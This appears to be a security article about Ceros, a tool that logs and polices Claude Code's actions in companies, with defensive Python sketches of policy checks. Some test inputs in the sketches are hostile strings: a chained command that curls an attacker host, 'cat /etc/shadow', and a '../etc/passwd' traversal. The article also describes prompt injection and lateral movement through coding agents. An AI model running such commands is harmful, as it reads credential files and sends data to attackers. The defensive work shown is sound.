How Ceros Gives Security Teams Visibility and Control in Claude Code

Photo: The Hacker News

Ceros offers security teams comprehensive visibility and control over application access, replacing traditional VPN solutions with an integrated Zero Trust Network Access (ZTNA) approach. By connecting users directly to applications rather than routing them through the corporate network, the platform is designed to prevent lateral movement across that network. A key advantage is granular access control: IT teams can precisely define who can access specific resources, when, and from which devices. Instead of the one-time authentication typical of a VPN, the solution continuously verifies identity and device status. For employees, this means faster and more secure work: there is no need to connect to the internal network, which reduces latency and increases productivity. For security teams, it means full traffic visibility, automatic logging of all connections, and the ability to block access immediately in case of a threat. The move from VPN to ZTNA is not just a technical upgrade but a fundamental shift in security approach, from the "trust inside, don't trust outside" model to "never trust, always verify."

In recent years, cybersecurity teams have built complex access control and identity management systems for users and service accounts. It seemed they had the situation under control: every access was logged and every permission was granted according to the principle of least privilege. But over the past few months, a completely new type of actor has entered many large organizations, operating outside the existing control mechanisms. Claude Code, an AI coding agent from Anthropic, is now used across entire engineering teams, where it reads files, executes shell commands, calls external APIs, and makes decisions based on its own reasoning. For security teams, this is an entirely new problem to solve.

The emergence of AI agents such as Claude Code reveals a fundamental gap in security architectures that were designed for humans and traditional automation systems. These new entities operate at a speed and scale that traditional monitoring systems struggle to track. They can execute many operations in quick succession, make decisions based on context that humans may find difficult to trace, and may reach resources they were never meant to access. This is precisely why companies like Ceros are beginning to offer solutions dedicated to providing visibility and control over AI agents in corporate environments.

A new actor in the security ecosystem: what changes in reality

For decades, the corporate security model has been based on the assumption that every access to resources comes from a human or from known, configured systems. IT teams could map data flows, monitor logins, set alerts for suspicious activity. Every actor had established permissions, every action could be linked to a specific user or service.


AI agents such as Claude Code completely change this equation. They are not simple scripts that execute predefined tasks but autonomous systems that read source code, analyze project structures, execute system commands, and decide dynamically which actions to take depending on context. They can open database connections, retrieve data from APIs, and modify configurations, often without direct human oversight of each step. Traditional access control systems, meanwhile, often treat them as ordinary users or do not see them at all.

The real problem is that Claude Code and similar agents can operate in the context of a human account or service account that already has broad access to resources. If an engineer has permissions to read a code repository, production database, and APIs, then Claude Code inheriting these permissions could theoretically access all these resources simultaneously — and do so without explicit approval of each operation. This opens the door to scenarios that traditional security teams never had to consider.

The gap in access controls: why traditional systems fail

Modern organizations invest millions of dollars in access management systems. They have Active Directory, Okta, Azure AD, multi-factor authentication, comprehensive audit systems. But all these solutions were designed with one assumption: that access is initiated by a human who is aware of their actions and can be held accountable.

When an AI agent works on behalf of an engineer, traditional systems often have no mechanism to distinguish actions performed by a human from actions performed by a machine. If an engineer logs into their workstation and then runs Claude Code, all operations performed by the agent may be recorded as that engineer's activities. The security system has no way to distinguish between when an engineer manually writes an SQL query and when Claude Code automatically generates and executes that query.
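
One way to picture a fix for this attribution gap is an audit record that stores the human principal and the executing actor as separate fields. The sketch below is a minimal illustration, not Ceros's data model; `AuditEvent` and its fields (`principal`, `actor_type`, `agent_name`) are hypothetical names chosen for this example.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class AuditEvent:
    """Hypothetical audit record that keeps the human principal and the executing actor apart."""
    principal: str             # the engineer whose credentials were used
    actor_type: str            # "human" or "agent" (assumed vocabulary)
    agent_name: Optional[str]  # e.g. "claude-code" when actor_type == "agent"
    action: str                # e.g. "sql.query"
    target: str                # resource that was touched


def agent_initiated(events: List[AuditEvent], principal: str) -> List[AuditEvent]:
    """Return only the events an agent performed on behalf of the given engineer."""
    return [e for e in events if e.principal == principal and e.actor_type == "agent"]


log = [
    AuditEvent("alice", "human", None, "sql.query", "orders_db"),
    AuditEvent("alice", "agent", "claude-code", "sql.query", "orders_db"),
    AuditEvent("alice", "agent", "claude-code", "shell.exec", "build-host"),
]

for event in agent_initiated(log, "alice"):
    print(event.agent_name, event.action, event.target)
```

In a log that records only the principal, the first two events would look identical; the extra fields are what make the engineer's manual query distinguishable from the agent's.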

Additionally, AI agents can work asynchronously and in the background, performing operations while the engineer is not actively at the computer. They can initiate network connections, retrieve data, and modify files within seconds. Traditional monitoring systems, tuned to the pace of human work, may not keep up with recording all of this activity; even when they do, they can generate so many alerts that the security team starts ignoring them.
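
A common way to limit alert fatigue is to summarize agent activity per session and raise one alert per suspicious session instead of one per event. The sketch below assumes a hypothetical event shape of `(session_id, action, allowed)` tuples, and the threshold of three denied actions is an arbitrary illustrative value, not a recommendation from Ceros or Anthropic.

```python
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Tuple

# (session_id, action, allowed): hypothetical event shape for this sketch
Event = Tuple[str, str, bool]


def summarize_sessions(events: Iterable[Event]) -> Dict[str, Counter]:
    """Collapse a raw event stream into per-session counts of each action and of denials."""
    summary: Dict[str, Counter] = defaultdict(Counter)
    for session_id, action, allowed in events:
        summary[session_id][action] += 1
        if not allowed:
            summary[session_id]["_denied"] += 1
    return dict(summary)


def sessions_to_alert(summary: Dict[str, Counter], max_denied: int = 3) -> List[str]:
    """Return one entry per session whose denial count exceeds the threshold."""
    return sorted(s for s, counts in summary.items() if counts["_denied"] > max_denied)


# 500 routine reads in one session, 5 denied API calls in another.
events = [("s1", "file.read", True)] * 500 + [("s2", "api.call", False)] * 5
summary = summarize_sessions(events)
print(summary["s1"]["file.read"])  # 500
print(sessions_to_alert(summary))  # ['s2']
```

The 500 routine reads produce no alert at all; only the session with repeated denials surfaces, as a single item.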

Ceros solution: real-time visibility for AI agents

Ceros approaches this problem differently than traditional security solutions. Rather than trying to fit AI agents into existing access control frameworks, Ceros builds a dedicated visibility and control layer that is specifically designed for this new type of actor. The solution works through instrumentation of the environment in which Claude Code and similar agents are run.

In practice, this means Ceros installs itself in the layer between the AI agent and the resources that agent is trying to access. Every operation — every file read, every shell command, every API call — passes through a Ceros observation point. The system records exactly what is happening, who (or what) is initiating it, and what resources it is trying to access. But this is not just a simple log — it is an interactive control system that can make real-time decisions about whether an operation should be allowed or blocked.
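
The interception pattern can be sketched as a wrapper that every agent operation must pass through: it records the operation, asks a policy for a decision, and only then executes it. This illustrates the general technique, not Ceros's implementation; `Checkpoint`, `Operation`, and the `decide` callback are hypothetical names.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class Operation:
    actor: str     # who or what initiated it, e.g. "claude-code@alice"
    kind: str      # "file.read", "shell.exec", "api.call", ...
    resource: str  # path, command, or URL being accessed


@dataclass
class Checkpoint:
    """Hypothetical observation point placed between an agent and the resources it uses."""
    decide: Callable[[Operation], bool]  # policy decision: True means allow
    records: List[Tuple[Operation, str]] = field(default_factory=list)

    def run(self, op: Operation, execute: Callable[[], str]) -> str:
        allowed = self.decide(op)
        # Every operation is recorded, whether or not it is allowed to proceed.
        self.records.append((op, "allow" if allowed else "block"))
        if not allowed:
            raise PermissionError(f"blocked {op.kind} on {op.resource}")
        return execute()


# Illustrative policy: block any shell command that touches /etc.
checkpoint = Checkpoint(decide=lambda op: not (op.kind == "shell.exec" and "/etc" in op.resource))

print(checkpoint.run(Operation("claude-code@alice", "file.read", "src/app.py"), lambda: "file contents"))
try:
    checkpoint.run(Operation("claude-code@alice", "shell.exec", "cat /etc/shadow"), lambda: "")
except PermissionError as err:
    print(err)
```

Because the decision happens before `execute` is called, a blocked operation never reaches the resource, yet it still appears in `records`.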

Particularly important is that Ceros can distinguish between actions performed by the engineer themselves and actions performed by Claude Code acting on behalf of that engineer. The system can apply different policies to each of these scenarios. For example, an engineer may have permissions to read sensitive data, but Claude Code acting on behalf of that engineer may be restricted to reading only specific fields or only during specific hours.
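
The engineer-versus-agent distinction can be expressed as two policies keyed on actor type. This is a sketch under stated assumptions: the field names, the 09:00 to 18:00 window, and the `filter_row` helper are hypothetical and only illustrate the field and time restrictions described in the paragraph.

```python
from dataclasses import dataclass
from datetime import datetime, time
from typing import Dict, FrozenSet, Optional, Tuple


@dataclass(frozen=True)
class ReadPolicy:
    allowed_fields: Optional[FrozenSet[str]]  # None means every field is readable
    window: Optional[Tuple[time, time]]       # (start, end) local time; None means any time


POLICIES: Dict[str, ReadPolicy] = {
    # The engineer may read the full record at any time.
    "human": ReadPolicy(allowed_fields=None, window=None),
    # The agent acting for the same engineer sees fewer fields, and only during working hours.
    "agent": ReadPolicy(allowed_fields=frozenset({"id", "status"}), window=(time(9), time(18))),
}


def filter_row(row: Dict[str, object], actor_type: str, now: datetime) -> Dict[str, object]:
    """Apply the actor's policy to one record, raising if the read is outside the time window."""
    policy = POLICIES[actor_type]
    if policy.window is not None:
        start, end = policy.window
        if not (start <= now.time() < end):
            raise PermissionError(f"{actor_type} reads not allowed at {now:%H:%M}")
    if policy.allowed_fields is None:
        return dict(row)
    return {k: v for k, v in row.items() if k in policy.allowed_fields}


row = {"id": 42, "status": "active", "email": "user@example.com"}
print(filter_row(row, "human", datetime(2026, 4, 6, 22, 0)))   # full record, even at night
print(filter_row(row, "agent", datetime(2026, 4, 6, 10, 30)))  # only id and status
```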

Zero Trust principle applied to agents: a new security standard

Zero Trust Network Access (ZTNA) has been an established cybersecurity trend for human users for years. The idea is that no one is trusted automatically: every access must be verified, every connection authorized, and every action logged. Rather than building a security perimeter around the corporate network, ZTNA treats every access as potentially hostile until it is verified.

Ceros applies a similar philosophy to AI agents. Rather than assuming that Claude Code is a "trusted" tool because it was launched by a trusted engineer, the system treats every agent operation as potentially risky. Every access request is verified against defined policies. Is the agent trying to access a resource it shouldn't have access to? Is the operation consistent with the agent's historical activity pattern? Is the request coming from an expected network location?

This approach matters because AI agents can be vulnerable to various types of attacks. If an attacker manages to steer Claude Code into performing specific operations through prompt injection, the system should be able to detect it, for example by observing that the agent is trying to access resources it has never accessed before. Similarly, if an engineer's account is compromised and an attacker tries to use Claude Code to move laterally through the network, Ceros should be able to notice and block it.
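
The three verification questions, together with the "never accessed before" signal for prompt injection, can be combined into one evaluation step. This is a simplified sketch, not how Ceros scores requests: the allow-listed prefixes, the per-agent history set, and the `10.0.0.0/8` corporate range are hypothetical values.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import List, Set


@dataclass
class AgentProfile:
    allowed_prefixes: List[str]                            # resources the policy permits
    seen_resources: Set[str] = field(default_factory=set)  # historical baseline for this agent
    expected_network: str = "10.0.0.0/8"                   # assumed corporate address range


def evaluate(profile: AgentProfile, resource: str, source_ip: str) -> str:
    """Return 'deny', 'review', or 'allow' for a single access request."""
    # 1. Is the resource covered by policy at all?
    if not any(resource.startswith(p) for p in profile.allowed_prefixes):
        return "deny"
    # 2. Does the request come from an expected network location?
    if ipaddress.ip_address(source_ip) not in ipaddress.ip_network(profile.expected_network):
        return "deny"
    # 3. Is it consistent with past behaviour? A first-time access is escalated, not silently allowed.
    if resource not in profile.seen_resources:
        return "review"
    return "allow"


profile = AgentProfile(allowed_prefixes=["repo/", "api/metrics"], seen_resources={"repo/src/main.py"})
print(evaluate(profile, "repo/src/main.py", "10.1.2.3"))     # allow
print(evaluate(profile, "repo/.env", "10.1.2.3"))            # review
print(evaluate(profile, "db/prod/customers", "10.1.2.3"))    # deny
print(evaluate(profile, "repo/src/main.py", "203.0.113.7"))  # deny
```

Sending a novel but permitted access to review rather than denying it avoids blocking legitimate work that happens to touch a new file, while still surfacing the pattern a prompt-injected agent would produce.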

Practical implementation: what it looks like in real organizations

In practice, implementing Ceros in an engineering organization looks like this: the DevOps or security team configures policies that define what Claude Code (and other AI agents) can do. These policies can be very detailed. For example, you can define that Claude Code can read files from a code repository, but cannot modify files containing sensitive data. It can execute specific shell commands, but cannot install new software. It can call specific APIs, but cannot retrieve data from the production database.
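
The example rules can be written down as data and evaluated with a first-match, default-deny strategy. This policy format is hypothetical and for illustration only, since the article does not describe Ceros's actual policy language; the paths, program names, and hostnames are placeholders.

```python
import fnmatch
import posixpath
import shlex
from typing import List, Tuple

# Hypothetical policy: (operation kind, glob pattern, effect).
# Rules are checked in order; the first match wins and anything unmatched is denied.
RULES: List[Tuple[str, str, str]] = [
    ("file.read", "repo/*", "allow"),                # read any file in the repository
    ("file.write", "repo/config/secrets*", "deny"),  # but never modify sensitive files
    ("file.write", "repo/*", "allow"),
    ("shell.exec", "git", "allow"),                  # allow-listed programs only;
    ("shell.exec", "pytest", "allow"),               # installers such as pip are not listed
    ("api.call", "https://metrics.example.internal/*", "allow"),
    ("db.query", "prod-*", "deny"),                  # explicit deny documents intent
]

SHELL_METACHARACTERS = set(";&|`$<>\n")


def decide(kind: str, target: str) -> str:
    if kind.startswith("file."):
        # Collapse "repo/../etc/passwd" to "etc/passwd" so traversal cannot slip past "repo/*".
        target = posixpath.normpath(target)
    if kind == "shell.exec":
        # Refuse chained or redirected commands; otherwise match on the program name only.
        if SHELL_METACHARACTERS & set(target):
            return "deny"
        try:
            argv = shlex.split(target)
        except ValueError:  # unbalanced quotes
            return "deny"
        if not argv:
            return "deny"
        target = argv[0]
    for rule_kind, pattern, effect in RULES:
        if rule_kind == kind and fnmatch.fnmatchcase(target, pattern):
            return effect
    return "deny"  # default deny: anything not explicitly allowed is blocked


for kind, target in [
    ("file.read", "repo/src/app.py"),
    ("file.write", "repo/config/secrets.yaml"),
    ("file.read", "repo/../etc/passwd"),
    ("shell.exec", "git status"),
    ("shell.exec", "pip install requests"),
    ("shell.exec", "git status && curl https://attacker.example"),
    ("db.query", "prod-customers"),
]:
    print(f"{kind:10} {target:45} -> {decide(kind, target)}")
```

Default deny means a forgotten rule fails closed: an operation nobody anticipated is blocked and logged rather than silently permitted.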

When Claude Code attempts to perform an operation, Ceros checks that operation against the policies. If the operation is allowed, it is executed. If it is not allowed, it is blocked — and the event is logged and potentially reported to the security team. Importantly, all of this happens in real-time, without the need for manual human intervention for each operation.

For security teams, this means a radical change in how they can control access to resources. Instead of an "all or nothing" policy, where an engineer either has access to a resource or does not, they can now define very precise rules for AI agents. They can, for example, allow Claude Code to read code but not to make changes in production, or allow it to retrieve metrics from monitoring systems but not to change alert settings.

Integration with existing security infrastructure

One of the key strengths of Ceros is that it doesn't try to replace existing security systems. Instead, it integrates with them. The system can work with traditional access management systems, audit systems, and secrets management platforms. This means organizations don't have to redesign their entire security infrastructure — they can simply add a new control layer for AI agents.

For example, Ceros can integrate with a secrets management system to ensure that Claude Code doesn't have access to sensitive authentication data unless it is absolutely necessary for completing a specific task. It can integrate with audit systems to ensure that all agent operations are logged in a central log. It can integrate with monitoring systems to report anomalies in agent behavior.
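
The "only when necessary" rule for secrets is often implemented as short-lived, single-use grants tied to an approved task. This is a minimal in-memory sketch, assuming a hypothetical `SecretBroker` sitting in front of a real secrets manager; it is not an API of Ceros or of any particular vault product, and the secret names and values are placeholders.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional, Set


@dataclass
class Grant:
    secret_name: str
    expires_at: float  # time.monotonic() deadline


class SecretBroker:
    """Hypothetical broker: an agent receives a secret only via a grant tied to an approved task."""

    def __init__(self, store: Dict[str, str], task_needs: Dict[str, Set[str]], ttl_seconds: float = 300):
        self._store = store            # stands in for a real secrets manager
        self._task_needs = task_needs  # which secrets each approved task may use
        self._ttl = ttl_seconds
        self._grants: Dict[str, Grant] = {}

    def request(self, task_id: str, secret_name: str) -> Optional[str]:
        """Issue a short-lived grant token, or None if the task does not need this secret."""
        if secret_name not in self._task_needs.get(task_id, set()):
            return None
        token = secrets.token_urlsafe(16)
        self._grants[token] = Grant(secret_name, time.monotonic() + self._ttl)
        return token

    def redeem(self, token: str) -> str:
        """Exchange a grant for the secret value; each grant works once and only before expiry."""
        grant = self._grants.pop(token, None)
        if grant is None or time.monotonic() > grant.expires_at:
            raise PermissionError("grant missing, already used, or expired")
        return self._store[grant.secret_name]


broker = SecretBroker(
    store={"DEPLOY_KEY": "example-deploy-key", "DB_PASSWORD": "example-db-password"},
    task_needs={"task-123": {"DEPLOY_KEY"}},
)
token = broker.request("task-123", "DEPLOY_KEY")
print(broker.redeem(token) == "example-deploy-key")  # True
print(broker.request("task-123", "DB_PASSWORD"))     # None: not needed for this task
```

Each grant request and redemption is also a natural point to emit an audit event to the central log.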

This approach also has practical significance for Polish organizations. Many of them have already invested in security systems from well-known vendors — Microsoft, Okta, Palo Alto Networks. Ceros doesn't force them to abandon these investments. Instead, it offers an added layer that works together with existing systems.

Challenges and limitations of the visibility-based approach

However, the Ceros solution is not a panacea. There are several fundamental challenges that every organization must consider before implementing such a system. First, defining correct policies is difficult. If policies are too restrictive, Claude Code won't be able to work effectively — engineers will be frustrated and will try to circumvent the system. If policies are too permissive, the system won't provide sufficient protection.

Second, visibility alone does not guarantee security. Ceros can record everything Claude Code does, but if no one analyzes these logs and there are no processes for responding to anomalies, that visibility achieves little. It requires investment in security teams, log analysis tools, and incident response procedures.

Third, there is the question of performance. If every Claude Code operation must pass through a Ceros observation point, will this slow down the agent's work? Systems of this kind are generally designed to keep the added latency per operation small, but in very large organizations where Claude Code performs millions of operations daily, even small delays can add up.
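
How small delays add up is simple arithmetic: total added delay equals the number of operations times the per-operation overhead. The figures below (5 million operations per day, 2 ms per policy check) are hypothetical, not measurements of Ceros.

```python
def added_latency_seconds(operations: int, overhead_ms: float) -> float:
    """Total delay added when each operation pays a fixed policy-check overhead."""
    return operations * overhead_ms / 1000.0


# Hypothetical figures for illustration only.
daily_ops = 5_000_000
overhead_ms = 2.0
total = added_latency_seconds(daily_ops, overhead_ms)
print(f"{total:,.0f} s per day (~{total / 3600:.1f} h across all sessions)")
print(f"{added_latency_seconds(200, overhead_ms):.1f} s for a 200-operation task")
```

The organization-wide total (here 10,000 s, about 2.8 hours) is spread across many parallel sessions; what an individual engineer notices is the per-task figure, which in this example is 0.4 s.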

The future of access control in the age of AI agents

The emergence of AI agents such as Claude Code means that traditional security models will have to evolve. You can no longer think about access in terms of "user has permissions to resource". You need to think in terms of "in what context, for what purpose, with what restrictions does the AI agent have access to the resource".

Ceros is only an early answer to this problem. In the future, we can expect more advanced systems that automatically learn appropriate policies by observing agent behavior, anticipate threats before they materialize, and adjust permissions dynamically as risk changes.

For Polish organizations that are just beginning to experiment with AI agents, this is the moment to plan security from the start. Rather than deploying Claude Code or other agents without controls and then trying to fix security issues later, it's worth thinking from the beginning about how these new entities will be monitored and controlled. Solutions like Ceros can be key to being able to leverage the potential of AI agents without risking organizational security.

More from Security

$285 Million Drift Hack Traced to Six-Month DPRK Social Engineering Operation

36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants

Fortinet Patches Actively Exploited CVE-2026-35616 in FortiClient EMS

China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing

Related Articles

How LiteLLM Turned Developer Machines Into Credential Vaults for Attackers

Apr 6

Qilin and Warlock Ransomware Use Vulnerable Drivers to Disable 300+ EDR Tools

Apr 6



BKA Identifies REvil Leaders Behind 130 German Ransomware Attacks

Apr 6